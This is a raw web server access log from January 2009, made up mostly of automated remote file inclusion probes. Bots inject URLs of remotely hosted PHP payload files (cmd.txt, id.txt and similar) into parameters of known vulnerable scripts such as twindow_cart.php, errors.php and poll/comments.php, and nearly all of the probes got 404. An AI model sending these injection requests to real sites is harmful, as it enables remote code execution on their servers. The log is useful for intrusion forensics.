193.138.29.60 - - [13/Jan/2009:04:27:14 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
64.22.110.198 - - [13/Jan/2009:04:35:15 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
64.22.110.198 - - [13/Jan/2009:04:35:16 -0600] "GET //include/admin.lib.inc.php?site_path=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
193.138.29.60 - - [13/Jan/2009:04:37:15 -0600] "GET /logs/access_log.1228867200//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
72.29.69.239 - - [13/Jan/2009:04:37:15 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
72.29.69.239 - - [13/Jan/2009:04:37:15 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
72.29.69.239 - - [13/Jan/2009:04:37:15 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
72.29.69.239 - - [13/Jan/2009:04:37:15 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
72.29.69.239 - - [13/Jan/2009:04:37:18 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
72.29.69.239 - - [13/Jan/2009:04:37:18 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.wehrmachtsgespanne.com/apboard/bajo-id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
66.34.133.35 - - [13/Jan/2009:04:38:08 -0600] "GET /logs/access_log.1228867200//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.dito.nl/php_content/shop/customer/readme.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
203.143.124.44 - - [13/Jan/2009:04:41:38 -0600] "GET /logs/errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.143.124.44 - - [13/Jan/2009:04:41:43 -0600] "GET /errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.143.124.44 - - [13/Jan/2009:04:53:30 -0600] "GET /logs//zb41/include/write.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
203.143.124.44 - - [13/Jan/2009:04:53:35 -0600] "GET //zb41/include/write.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
77.221.130.2 - - [13/Jan/2009:04:53:45 -0600] "GET /logs/access_log.1229817600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:04:53:45 -0600] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:04:53:45 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:04:57:24 -0600] "GET /logs/access_log.1227312000/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
201.3.132.147 - - [13/Jan/2009:04:59:22 -0600] "GET /logs//zb41/include/write.php?dir=http://crownres.com/cronica.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
201.3.132.147 - - [13/Jan/2009:04:59:24 -0600] "GET //zb41/include/write.php?dir=http://crownres.com/cronica.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
87.106.102.198 - - [13/Jan/2009:05:00:45 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maddogmarketing.com/logs/readme.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
87.106.102.198 - - [13/Jan/2009:05:00:45 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maddogmarketing.com/logs/readme.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
81.21.68.141 - - [13/Jan/2009:05:33:06 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://thebestgalleriaauctions.com//templates/r0x.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
81.21.68.141 - - [13/Jan/2009:05:33:07 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://thebestgalleriaauctions.com//templates/r0x.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
81.21.68.141 - - [13/Jan/2009:05:33:25 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://thebestgalleriaauctions.com//templates/r0x.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
81.21.68.141 - - [13/Jan/2009:05:33:25 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://thebestgalleriaauctions.com//templates/r0x.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
203.162.139.20 - - [13/Jan/2009:05:36:25 -0600] "GET /logs//zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 311 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:05:36:26 -0600] "GET //zb41/include/write.php?dir=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 306 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:05:38:39 -0600] "GET /logs/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
203.162.139.20 - - [13/Jan/2009:05:38:39 -0600] "GET /errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
203.162.139.20 - - [13/Jan/2009:05:38:39 -0600] "GET /logs/access_log.1228262400/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
203.162.139.20 - - [13/Jan/2009:05:39:59 -0600] "GET /logs/access_log.1228262400/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:05:39:59 -0600] "GET /logs/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:05:40:00 -0600] "GET /errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:05:40:20 -0600] "GET /logs/access_log.1227657600/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.55.208.134 - - [13/Jan/2009:05:45:31 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [13/Jan/2009:05:45:33 -0600] "GET /logs/access_log.1223942400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.22.110.198 - - [13/Jan/2009:05:46:54 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
64.22.110.198 - - [13/Jan/2009:05:46:55 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/bangsat97/cmd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
203.162.139.20 - - [13/Jan/2009:05:54:35 -0600] "GET /logs//shop/index.php?_shop_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:05:54:35 -0600] "GET //shop/index.php?_shop_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:05:54:35 -0600] "GET /logs/access_log.1228608000//shop/index.php?_shop_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:05:59:10 -0600] "GET /logs/convert/mvcw.php?vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:05:59:10 -0600] "GET /logs/access_log.1230076800/convert/mvcw.php?vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:05:59:10 -0600] "GET /convert/mvcw.php?vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
8.7.26.27 - - [13/Jan/2009:06:03:34 -0600] "GET /logs///include/bbs.lib.inc.php?site_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
8.7.26.27 - - [13/Jan/2009:06:03:34 -0600] "GET ///include/bbs.lib.inc.php?site_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
77.221.130.2 - - [13/Jan/2009:06:17:05 -0600] "GET /logs/access_log.1230076800/convert/mvcw.php?step=1&vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:06:17:06 -0600] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [13/Jan/2009:06:17:06 -0600] "GET /convert/mvcw.php?step=1&vwar_root=http://desirdesign.com/nimth/id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.94.24.125 - - [13/Jan/2009:06:21:24 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/id? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.94.24.125 - - [13/Jan/2009:06:21:26 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/id? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
203.162.139.20 - - [13/Jan/2009:06:44:47 -0600] "GET //shop/index.php?_shop_path=http://e-mpresario.com.ar/idrose.txt?%0D? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:06:44:47 -0600] "GET /logs/access_log.1228608000//shop/index.php?_shop_path=http://e-mpresario.com.ar/idrose.txt?%0D? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
203.162.139.20 - - [13/Jan/2009:06:44:47 -0600] "GET /logs//shop/index.php?_shop_path=http://e-mpresario.com.ar/idrose.txt?%0D? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.249.71.142 - - [13/Jan/2009:06:46:12 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.142 - - [13/Jan/2009:06:46:12 -0600] "GET /logs/access_log.1119139200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.141 - - [13/Jan/2009:06:52:00 -0600] "GET /logs/access_log.1121385600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:06:57:42 -0600] "GET /logs/access_log.1168473600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.94.24.125 - - [13/Jan/2009:07:02:06 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/id? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.94.24.125 - - [13/Jan/2009:07:02:07 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/id? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
66.249.71.142 - - [13/Jan/2009:07:14:56 -0600] "GET /logs/access_log.1143417600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.31.57.133 - - [13/Jan/2009:07:15:42 -0600] "GET /logs/access_log.1196380800 HTTP/1.1" 200 4536 "http://search.live.com/results.aspx?FORM=DNSAS&q=www.fortpit""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
62.94.24.125 - - [13/Jan/2009:07:15:57 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.94.24.125 - - [13/Jan/2009:07:15:57 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://62.94.24.124/cerignola/home/CuteNews/...??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
66.249.71.141 - - [13/Jan/2009:07:20:45 -0600] "GET /logs/access_log.1204588800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.162.139.20 - - [13/Jan/2009:07:23:51 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 317 "-""libwww-perl/5.800"
203.162.139.20 - - [13/Jan/2009:07:23:51 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sooss.at/contenido/includes/api/idxx.txt?????? HTTP/1.1" 404 312 "-""libwww-perl/5.800"
66.249.71.143 - - [13/Jan/2009:07:26:28 -0600] "GET /logs/access_log.1212105600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:07:32:14 -0600] "GET /logs/access_log.1135468800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:07:38:18 -0600] "GET /logs/access_log.1119225600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.34.162.154 - - [13/Jan/2009:07:42:48 -0600] "GET /logs//zb41/include/write.php?dir=http://www.lph.go.th/main/SBU/RenovateWeb/appserv/ownz.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
64.34.162.154 - - [13/Jan/2009:07:42:48 -0600] "GET //zb41/include/write.php?dir=http://www.lph.go.th/main/SBU/RenovateWeb/appserv/ownz.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
66.249.71.142 - - [13/Jan/2009:07:43:41 -0600] "GET /logs/access_log.1128124800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:07:49:30 -0600] "GET /logs/access_log.1119312000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.159.53.138 - - [13/Jan/2009:07:52:33 -0600] "GET /logs/errors.php?error=http://blog.3s.com.ua/im/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.159.53.138 - - [13/Jan/2009:07:52:33 -0600] "GET /errors.php?error=http://blog.3s.com.ua/im/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
88.84.146.23 - - [13/Jan/2009:07:54:38 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gspdesigns.com/rms//tpl/doc/header.jpg? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.84.146.23 - - [13/Jan/2009:07:54:38 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gspdesigns.com/rms//tpl/doc/header.jpg? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
66.249.71.141 - - [13/Jan/2009:07:55:16 -0600] "GET /logs/access_log.1159574400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.27.81 - - [13/Jan/2009:07:57:17 -0600] "GET /logs//errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.189.27.81 - - [13/Jan/2009:07:57:18 -0600] "GET //errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.249.71.143 - - [13/Jan/2009:08:01:07 -0600] "GET /logs/access_log.1149465600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.20.159 - - [13/Jan/2009:08:03:08 -0600] "GET /logs/errors.php?error=http://www.sema-sa.ch/pit-id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.23.20.159 - - [13/Jan/2009:08:03:08 -0600] "GET /errors.php?error=http://www.sema-sa.ch/pit-id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.249.71.142 - - [13/Jan/2009:08:06:57 -0600] "GET /logs/access_log.1218240000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.176.122 - - [13/Jan/2009:08:07:02 -0600] "GET /logs//errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.176.122 - - [13/Jan/2009:08:07:03 -0600] "GET //errors.php?error=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.226.166.122 - - [13/Jan/2009:08:07:23 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.loft-im-hof.de//wp-content/myfotos/raeume/DSC00583.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
213.226.166.122 - - [13/Jan/2009:08:07:23 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.loft-im-hof.de//wp-content/myfotos/raeume/DSC00583.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
66.249.71.142 - - [13/Jan/2009:08:12:48 -0600] "GET /logs/access_log.1218672000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:08:18:05 -0600] "GET /logs/access_log.1217635200 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.142 - - [13/Jan/2009:08:24:08 -0600] "GET /logs/access_log.1219190400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.143 - - [13/Jan/2009:08:31:26 -0600] "GET /logs/access_log.1217980800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.193.20.48 - - [13/Jan/2009:08:37:26 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.lightheartessences.co.uk/v6-i.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.193.20.48 - - [13/Jan/2009:08:37:26 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.lightheartessences.co.uk/v6-i.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:43:29 -0600] "GET /logs/!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:43:29 -0600] "GET /!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:43:29 -0600] "GET /logs/!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:43:30 -0600] "GET /!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:50:21 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:50:21 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:50:34 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
75.144.64.225 - - [13/Jan/2009:08:50:34 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
193.146.193.6 - - [13/Jan/2009:08:51:55 -0600] "GET /logs/!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
193.146.193.6 - - [13/Jan/2009:08:51:56 -0600] "GET /!rfihttp://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
189.54.249.148 - - [13/Jan/2009:08:58:49 -0600] "GET /logs//errors.php?error=http://www.cosmickls.net/ids?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:08:58:50 -0600] "GET //errors.php?error=http://www.cosmickls.net/ids?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:08:59:04 -0600] "GET /logs//errors.php?error=http://www.cosmickls.net/ids?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:08:59:05 -0600] "GET //errors.php?error=http://www.cosmickls.net/ids?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.146.193.6 - - [13/Jan/2009:09:01:07 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.146.193.6 - - [13/Jan/2009:09:01:07 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
209.172.41.141 - - [13/Jan/2009:09:18:25 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.172.41.141 - - [13/Jan/2009:09:18:25 -0600] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.172.41.141 - - [13/Jan/2009:09:18:25 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://i0.co.kr/i0mall//admin/tukulid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
189.54.249.148 - - [13/Jan/2009:09:22:27 -0600] "GET /logs//include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:09:22:27 -0600] "GET /logs//include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:09:22:28 -0600] "GET //include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
189.54.249.148 - - [13/Jan/2009:09:22:28 -0600] "GET //include/write.php?dir=http://www.cosmickls.net/ids?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
83.19.243.146 - - [13/Jan/2009:09:23:03 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
83.19.243.146 - - [13/Jan/2009:09:23:15 -0600] "GET /@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
83.19.243.146 - - [13/Jan/2009:09:32:25 -0600] "GET /logs/@phphttp://www.ungalliance.dk/member/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
